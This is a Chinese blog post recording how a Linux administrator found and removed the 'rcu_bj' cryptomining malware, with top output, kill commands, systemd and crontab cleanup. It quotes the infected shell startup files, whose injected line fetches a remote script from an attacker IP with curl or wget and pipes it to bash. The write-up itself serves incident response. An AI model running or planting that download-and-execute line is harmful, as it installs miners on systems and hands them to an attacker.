美文网首页
记录一次挖矿病毒rcu_bj,导致CPU飙高处理

记录一次挖矿病毒rcu_bj,导致CPU飙高处理

作者: 无味wy | 来源:发表于2023-04-29 22:57 被阅读0次

    起因应该是gitlab漏洞导致(建议升级版本或者关闭公网)
    服务器监控到服务器CPU持续负载很高,登录服务器查看问题
    远程连接到服务器显示/root/.bashrc和/root/bash_frofile文件异常 (如下)

    [root@zbxserver ~]# ssh 192.168.64.8
    Last login: Sat Apr 29 18:48:51 2023 from 192.168.32.14
    -bash: /root/.bashrc: line 14: syntax error: unexpected end of file
    -bash: /root/.bash_profile: line 14: syntax error: unexpected end of file
    

    top查看,rcu_bj占用CPU

    Tasks: 129 total,   1 running, 128 sleeping,   0 stopped,   0 zombie
    %Cpu(s): 50.0 us,  4.3 sy,  0.0 ni, 45.5 id,  0.2 wa,  0.0 hi,  0.0 si,  0.0 st
    KiB Mem :  8173780 total,   153720 free,  3089492 used,  4930568 buff/cache
    KiB Swap:        0 total,        0 free,        0 used.  2575292 avail Mem 
    
      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                    
     1290 root      20   0 2438492 266040   2752 S  95.3  3.3   1022:12 rcu_bj                                                                                                     
     3649 root      20   0  556024  49620  10252 S   1.0  0.6 305:57.80 hosteye                                                                                                    
    32162 root      20   0  113540   1784   1268 S   0.7  0.0   8:55.98 sh                                                                                                         
     1053 work      20   0  799884  16432   4960 S   0.3  0.2  46:10.86 ral-agent                                                                                                  
     1054 work      20   0 1062904  13864   1572 S   0.3  0.2  75:48.77 php-cgi                                                                                                    
     8490 root      20   0   90652   2984   2108 S   0.3  0.0  40:59.38 rngd                                                                                                       
        1 root      20   0   51844   3756   2256 S   0.0  0.0 151:18.76 systemd                                                                                                    
        2 root      20   0       0      0      0 S   0.0  0.0   0:01.27 kthreadd                                                                                                   
        4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                                                                                               
        6 root      20   0       0      0      0 S   0.0  0.0  14:09.84 ksoftirqd/0                                                                                                
        7 root      rt   0       0      0      0 S   0.0  0.0   2:38.12 migration/0                                                                                                
        8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                                                                                     
        9 root      20   0       0      0      0 S   0.0  0.0 259:29.46 rcu_sched                                                                                                  
       10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                                                                                              
       11 root      rt   0       0      0      0 S   0.0  0.0   3:46.65 watchdog/0                                                                                                 
       12 root      rt   0       0      0      0 S   0.0  0.0   2:57.72 watchdog/1                                                                                                 
       13 root      rt   0       0      0      0 S   0.0  0.0   2:57.93 migration/1                                                                                                
       14 root      20   0       0      0      0 S   0.0  0.0  14:12.02 ksoftirqd/1                                                                                                
       16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                                                                                               
       18 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs                                                                                                  
       19 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns                                                                                                      
       20 root      20   0       0      0      0 S   0.0  0.0   0:21.82 khungtaskd                                                                                                 
       21 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback                                                                                                  
       22 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kintegrityd                                                                                                
       23 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                                                                                                     
       24 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 bioset                               
    

    打开异常文件发现异常病毒
    清除异常配置,如下面得IP地址,肯定是病毒无疑了

    [root@localhost ~]#  vim /root/.bashrc
    # .bashrc
    
    # User specific aliases and functions
    
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
    
    # Source global definitions
    if [ -f /etc/bashrc ]; then
            . /etc/bashrc
    fi
    (curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &
    
    [root@localhost ~]# vim /root/.bash_profile
    # .bash_profile
    
    # Get the aliases and functions
    if [ -f ~/.bashrc ]; then
            . ~/.bashrc
    fi
    
    # User specific environment and startup programs
    
    PATH=$PATH:$HOME/bin
    
    export PATH
    (curl -s http://123.30.179.206:8189/solr/.v7/booster || wget -q -O - http://123.30.179.206:8189/solr/.v7/booster | bash -sh >/dev/null 2>&1 &
    

    这个病毒一般会注册自动启动服务,所以要先停掉,不然kill掉会重启

    [root@localhost ~]#  systemctl disable systemd_s.service
    Removed symlink /etc/systemd/system/multi-user.target.wants/systemd_s.service.
    You have new mail in /var/spool/mail/root
    [root@localhost ~]#  systemctl stop systemd_s.service
    

    现在查看进程kill掉即可,不kill掉3个服务的话你执行crontab -e 时候会自动退出不能编辑

    [root@localhost ~]#  ps -ef|grep rcu
    root         8     2  0  2021 ?        00:00:00 [rcu_bh]
    root         9     2  0  2021 ?        02:58:05 [rcu_sched]
    root     22528 18979  0 19:51 pts/0    00:00:00 grep --color=auto rcu
    root     24392     1  0 00:58 ?        00:00:20 /bin/sh /usr/lib/sys/rcu_udev
    root     24461 24392  1 00:58 ?        00:12:46 /bin/sh /usr/lib/sys/rcu_libk
    root     25725     1 90 00:59 ?        16:58:48 /usr/lib/sys/rcu_bj
    [root@localhost ~]# kill -9 24392
    [root@localhost ~]# kill -9 24461
    [root@localhost ~]# kill -9 25725
    #清理程序文件
    [root@localhost ~]# cd /usr/lib/sys
    [root@localhost sys]#  cat /dev/null >rcu_bj
    [root@localhost sys]#  cat /dev/null >rcu_libk
    [root@localhost sys]#  cat /dev/null >rcu_udev
    [root@localhost sys]#  cat /dev/null >systemd
    #释放内存
    [root@localhost sys]#  echo 1 > /proc/sys/vm/drop_caches
    [root@localhost sys]#  echo 2 > /proc/sys/vm/drop_caches
    [root@localhost sys]#  echo 3 > /proc/sys/vm/drop_caches
    #执行crontab -e 删除第一个病毒执行任务
    [root@localhost sys]# crontab -e
    */5 * * * * /bin/bash /usr/lib/sys/systemd
    */5 * * * * /opt/hosteye/bin/upgrade --upgrade_mode=8>/dev/null 2>&1
    

    这个病毒会关闭系统日志,清楚完开启日志 sudo systemctl restart rsyslog

    相关文章

      网友评论

          本文标题:记录一次挖矿病毒rcu_bj,导致CPU飙高处理

          本文链接:https://www.haomeiwen.com/subject/bcywjdtx.html